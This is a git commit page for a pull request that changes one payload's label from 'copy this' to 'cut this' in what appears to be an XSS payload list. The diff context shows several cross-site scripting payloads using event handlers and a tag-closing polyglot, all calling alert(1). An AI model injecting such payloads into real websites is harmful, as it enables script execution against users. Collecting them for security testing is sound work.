Merge pull request #127 from trietptm/master

Copy this -> Cut this
patch-1
Swissky 2019-12-02 10:52:19 +01:00 committed by GitHub
commit c125b35f98
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -63,7 +63,7 @@ javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
<x onclick=alert(1)>click this! <x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this! <x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this! <x oncontextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this! <x oncut=alert(1)>cut this!
<x ondblclick=alert(1)>double click this! <x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this! <x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this! <x contenteditable onfocus=alert(1)>focus this!